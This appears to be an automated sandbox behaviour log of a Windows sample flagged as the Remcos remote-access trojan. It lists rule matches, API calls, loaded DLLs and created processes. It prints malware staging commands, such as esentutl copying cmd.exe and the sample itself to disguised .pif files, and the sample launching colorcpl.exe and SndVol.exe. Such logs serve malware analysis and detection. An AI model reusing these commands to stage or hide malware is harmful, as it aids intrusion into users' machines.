Source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@20/10@10/3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027D798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 8_2_027D798D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027D798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 11_2_027D798D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0281798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 13_2_0281798D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C7FD4 GetDiskFreeSpaceA, 0_2_029C7FD4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CF4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 8_2_027CF4AF
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D6DC8 CoCreateInstance, 0_2_029D6DC8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027DB539 FindResourceA,LoadResource,LockResource,SizeofResource, 8_2_027DB539
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027DAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_027DAADB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe File created: C:\Users\Public\Libraries\PNO
Source: C:\Windows\SysWOW64\colorcpl.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: D2pQ4J4GGZ.exe ReversingLabs: Detection: 60%
Source: D2pQ4J4GGZ.exe Virustotal: Detection: 71%
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe File read: C:\Users\user\Desktop\D2pQ4J4GGZ.exe
Source: unknown Process created: C:\Users\user\Desktop\D2pQ4J4GGZ.exe "C:\Users\user\Desktop\D2pQ4J4GGZ.exe"
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hyfasrjV.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\D2pQ4J4GGZ.exe /d C:\\Users\\Public\\Libraries\\Vjrsafyh.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown Process created: C:\Users\Public\Libraries\Vjrsafyh.PIF "C:\Users\Public\Libraries\Vjrsafyh.PIF"
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown Process created: C:\Users\Public\Libraries\Vjrsafyh.PIF "C:\Users\Public\Libraries\Vjrsafyh.PIF"
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hyfasrjV.cmd" "
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\D2pQ4J4GGZ.exe /d C:\\Users\\Public\\Libraries\\Vjrsafyh.PIF /o
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: url.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: winhttpcom.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: tquery.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: spp.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: spp.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: spp.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppwmi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppcext.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: winscard.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: version.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: url.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: version.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: url.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ondemandconnroutehelper.dll
